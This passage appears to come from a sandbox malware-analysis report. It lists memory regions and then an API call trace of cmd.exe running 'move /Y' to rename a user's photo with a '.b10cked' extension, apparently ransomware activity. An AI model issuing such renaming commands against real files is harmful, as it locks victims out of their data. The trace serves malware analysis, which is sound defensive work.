entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 17684 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 17725 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 17726 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 17727 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 17728 start_va = 0x1f0000 end_va = 0x1fffff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 17729 start_va = 0x3f0000 end_va = 0x4effff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 17730 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 17731 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 17732 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 17733 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 17734 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 17735 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 17736 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 17737 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 17738 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 17739 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 17740 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 17741 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 17742 start_va = 0x190000 end_va = 0x196fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 17743 start_va = 0x1a0000 end_va = 0x1a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 17744 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 17745 start_va = 0x1c0000 end_va = 0x1c0fff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 17746 start_va = 0x4f0000 end_va = 0x5f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004f0000" filename = "" Region: id = 17747 start_va = 0x600000 end_va = 0x11fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000600000" filename = "" Region: id = 17748 start_va = 0x1200000 end_va = 0x1362fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001200000" filename = "" Thread: id = 259 os_tid = 0xa74 [0146.019] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x30f8dc | out: lpSystemTimeAsFileTime=0x30f8dc*(dwLowDateTime=0x90f77c40, dwHighDateTime=0x1d440a9)) [0146.019] GetCurrentProcessId () returned 0xaf4 [0146.019] GetCurrentThreadId () returned 0xa74 [0146.019] GetTickCount () returned 0x2d74b [0146.019] QueryPerformanceCounter (in: lpPerformanceCount=0x30f8d4 | out: lpPerformanceCount=0x30f8d4*=20280788930) returned 1 [0146.019] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0146.019] __set_app_type (_Type=0x1) [0146.019] __p__fmode () returned 0x76b331f4 [0146.020] __p__commode () returned 0x76b331fc [0146.020] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0146.020] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0146.020] GetCurrentThreadId () returned 0xa74 [0146.020] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xa74) returned 0x38 [0146.020] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0146.020] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0146.020] SetThreadUILanguage (LangId=0x0) returned 0x409 [0146.020] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0146.020] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x30f86c | out: phkResult=0x30f86c*=0x0) returned 0x2 [0146.020] VirtualQuery (in: lpAddress=0x30f8a3, lpBuffer=0x30f83c, dwLength=0x1c | out: lpBuffer=0x30f83c*(BaseAddress=0x30f000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0146.021] VirtualQuery (in: lpAddress=0x210000, lpBuffer=0x30f83c, dwLength=0x1c | out: lpBuffer=0x30f83c*(BaseAddress=0x210000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0146.021] VirtualQuery (in: lpAddress=0x211000, lpBuffer=0x30f83c, dwLength=0x1c | out: lpBuffer=0x30f83c*(BaseAddress=0x211000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0146.021] VirtualQuery (in: lpAddress=0x213000, lpBuffer=0x30f83c, dwLength=0x1c | out: lpBuffer=0x30f83c*(BaseAddress=0x213000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0146.021] VirtualQuery (in: lpAddress=0x310000, lpBuffer=0x30f83c, dwLength=0x1c | out: lpBuffer=0x30f83c*(BaseAddress=0x310000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0xe0000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0146.021] GetConsoleOutputCP () returned 0x1b5 [0146.021] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0146.021] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0146.021] _get_osfhandle (_FileHandle=1) returned 0x7 [0146.021] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0146.021] _get_osfhandle (_FileHandle=1) returned 0x7 [0146.021] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0146.021] _get_osfhandle (_FileHandle=1) returned 0x7 [0146.021] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0146.022] _get_osfhandle (_FileHandle=0) returned 0x3 [0146.022] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0146.022] _get_osfhandle (_FileHandle=0) returned 0x3 [0146.022] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0146.022] GetEnvironmentStringsW () returned 0x400178* [0146.022] FreeEnvironmentStringsW (penv=0x400178) returned 1 [0146.022] GetEnvironmentStringsW () returned 0x400178* [0146.022] FreeEnvironmentStringsW (penv=0x400178) returned 1 [0146.022] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x30e7dc | out: phkResult=0x30e7dc*=0x40) returned 0x0 [0146.022] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x30e7e4, lpData=0x30e7e8, lpcbData=0x30e7e0*=0x1000 | out: lpType=0x30e7e4*=0x0, lpData=0x30e7e8*=0xa0, lpcbData=0x30e7e0*=0x1000) returned 0x2 [0146.023] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x30e7e4, lpData=0x30e7e8, lpcbData=0x30e7e0*=0x1000 | out: lpType=0x30e7e4*=0x4, lpData=0x30e7e8*=0x1, lpcbData=0x30e7e0*=0x4) returned 0x0 [0146.023] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x30e7e4, lpData=0x30e7e8, lpcbData=0x30e7e0*=0x1000 | out: lpType=0x30e7e4*=0x0, lpData=0x30e7e8*=0x1, lpcbData=0x30e7e0*=0x1000) returned 0x2 [0146.023] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x30e7e4, lpData=0x30e7e8, lpcbData=0x30e7e0*=0x1000 | out: lpType=0x30e7e4*=0x4, lpData=0x30e7e8*=0x0, lpcbData=0x30e7e0*=0x4) returned 0x0 [0146.023] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x30e7e4, lpData=0x30e7e8, lpcbData=0x30e7e0*=0x1000 | out: lpType=0x30e7e4*=0x4, lpData=0x30e7e8*=0x40, lpcbData=0x30e7e0*=0x4) returned 0x0 [0146.023] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x30e7e4, lpData=0x30e7e8, lpcbData=0x30e7e0*=0x1000 | out: lpType=0x30e7e4*=0x4, lpData=0x30e7e8*=0x40, lpcbData=0x30e7e0*=0x4) returned 0x0 [0146.023] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x30e7e4, lpData=0x30e7e8, lpcbData=0x30e7e0*=0x1000 | out: lpType=0x30e7e4*=0x0, lpData=0x30e7e8*=0x40, lpcbData=0x30e7e0*=0x1000) returned 0x2 [0146.023] RegCloseKey (hKey=0x40) returned 0x0 [0146.023] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x30e7dc | out: phkResult=0x30e7dc*=0x40) returned 0x0 [0146.023] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x30e7e4, lpData=0x30e7e8, lpcbData=0x30e7e0*=0x1000 | out: lpType=0x30e7e4*=0x0, lpData=0x30e7e8*=0x40, lpcbData=0x30e7e0*=0x1000) returned 0x2 [0146.023] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x30e7e4, lpData=0x30e7e8, lpcbData=0x30e7e0*=0x1000 | out: lpType=0x30e7e4*=0x4, lpData=0x30e7e8*=0x1, lpcbData=0x30e7e0*=0x4) returned 0x0 [0146.023] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x30e7e4, lpData=0x30e7e8, lpcbData=0x30e7e0*=0x1000 | out: lpType=0x30e7e4*=0x0, lpData=0x30e7e8*=0x1, lpcbData=0x30e7e0*=0x1000) returned 0x2 [0146.023] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x30e7e4, lpData=0x30e7e8, lpcbData=0x30e7e0*=0x1000 | out: lpType=0x30e7e4*=0x4, lpData=0x30e7e8*=0x0, lpcbData=0x30e7e0*=0x4) returned 0x0 [0146.023] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x30e7e4, lpData=0x30e7e8, lpcbData=0x30e7e0*=0x1000 | out: lpType=0x30e7e4*=0x4, lpData=0x30e7e8*=0x9, lpcbData=0x30e7e0*=0x4) returned 0x0 [0146.023] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x30e7e4, lpData=0x30e7e8, lpcbData=0x30e7e0*=0x1000 | out: lpType=0x30e7e4*=0x4, lpData=0x30e7e8*=0x9, lpcbData=0x30e7e0*=0x4) returned 0x0 [0146.023] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x30e7e4, lpData=0x30e7e8, lpcbData=0x30e7e0*=0x1000 | out: lpType=0x30e7e4*=0x0, lpData=0x30e7e8*=0x9, lpcbData=0x30e7e0*=0x1000) returned 0x2 [0146.023] RegCloseKey (hKey=0x40) returned 0x0 [0146.023] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886374 [0146.023] srand (_Seed=0x5b886374) [0146.023] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Pictures\\WO_IX7~1.JPG\" \"C:\\Users\\EEBsYm5\\Pictures\\wo_IX7FkjtTmLgs.jpg.b10cked\"" [0146.023] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Pictures\\WO_IX7~1.JPG\" \"C:\\Users\\EEBsYm5\\Pictures\\wo_IX7FkjtTmLgs.jpg.b10cked\"" [0146.024] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0146.024] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4018d8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0146.024] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0146.024] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0146.024] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0146.024] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0146.024] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0146.024] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0146.024] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0146.024] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0146.024] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0146.024] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0146.024] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0146.025] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0146.025] GetEnvironmentStringsW () returned 0x4022c8* [0146.025] FreeEnvironmentStringsW (penv=0x4022c8) returned 1 [0146.025] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0146.025] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0146.025] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0146.025] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0146.025] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0146.025] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0146.025] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0146.025] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0146.025] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0146.025] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0146.025] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x30f5a8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0146.025] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x30f5a8, lpFilePart=0x30f5a4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x30f5a4*="Desktop") returned 0x18 [0146.025] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0146.025] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x30f324 | out: lpFindFileData=0x30f324) returned 0x400008 [0146.026] FindClose (in: hFindFile=0x400008 | out: hFindFile=0x400008) returned 1 [0146.026] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x30f324 | out: lpFindFileData=0x30f324) returned 0x400008 [0146.026] FindClose (in: hFindFile=0x400008 | out: hFindFile=0x400008) returned 1 [0146.026] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x30f324 | out: lpFindFileData=0x30f324) returned 0x400008 [0146.026] FindClose (in: hFindFile=0x400008 | out: hFindFile=0x400008) returned 1 [0146.026] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0146.026] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0146.026] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0146.026] GetEnvironmentStringsW () returned 0x402ae8* [0146.027] FreeEnvironmentStringsW (penv=0x402ae8) returned 1 [0146.027] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0146.027] GetConsoleOutputCP () returned 0x1b5 [0146.027] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0146.027] GetUserDefaultLCID () returned 0x409 [0146.028] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0146.028] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x30f6e8, cchData=128 | out: lpLCData="0") returned 2 [0146.028] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x30f6e8, cchData=128 | out: lpLCData="0") returned 2 [0146.028] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x30f6e8, cchData=128 | out: lpLCData="1") returned 2 [0146.028] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0146.028] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0146.028] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0146.028] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0146.028] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0146.028] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0146.028] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0146.028] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0146.028] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0146.028] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0146.029] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0146.030] GetConsoleTitleW (in: lpConsoleTitle=0x3f08d8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0146.030] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0146.030] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0146.030] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0146.030] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0146.031] _wcsicmp (_String1="move", _String2=")") returned 68 [0146.031] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0146.031] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0146.031] _wcsicmp (_String1="IF", _String2="move") returned -4 [0146.031] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0146.031] _wcsicmp (_String1="REM", _String2="move") returned 5 [0146.031] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0146.034] GetConsoleTitleW (in: lpConsoleTitle=0x30f3e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0146.260] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0146.260] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0146.260] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0146.260] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0146.260] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0146.260] _wcsicmp (_String1="move", _String2="CD") returned 10 [0146.260] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0146.260] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0146.260] _wcsicmp (_String1="move", _String2="REN") returned -5 [0146.260] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0146.260] _wcsicmp (_String1="move", _String2="SET") returned -6 [0146.260] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0146.260] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0146.260] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0146.260] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0146.260] _wcsicmp (_String1="move", _String2="MD") returned 11 [0146.260] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0146.260] _wcsicmp (_String1="move", _String2="RD") returned -5 [0146.260] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0146.260] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0146.260] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0146.260] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0146.260] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0146.260] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0146.260] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0146.260] _wcsicmp (_String1="move", _String2="VER") returned -9 [0146.260] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0146.260] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0146.260] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0146.260] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0146.260] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0146.260] _wcsicmp (_String1="move", _String2="START") returned -6 [0146.260] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0146.260] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0146.260] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0146.262] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0146.262] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0146.262] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x30f19c, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x30f194, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x30f194*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0146.263] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0146.263] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0146.263] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0146.263] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0146.263] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0146.263] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0146.263] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0146.263] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0146.263] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0146.263] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0146.263] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0146.263] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0146.263] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0146.263] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0146.263] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0146.263] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0146.263] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0146.263] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0146.263] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0146.263] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0146.263] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0146.263] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0146.263] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0146.263] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0146.263] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0146.263] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0146.263] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0146.263] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0146.263] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0146.264] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0146.264] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0146.264] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0146.264] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0146.264] 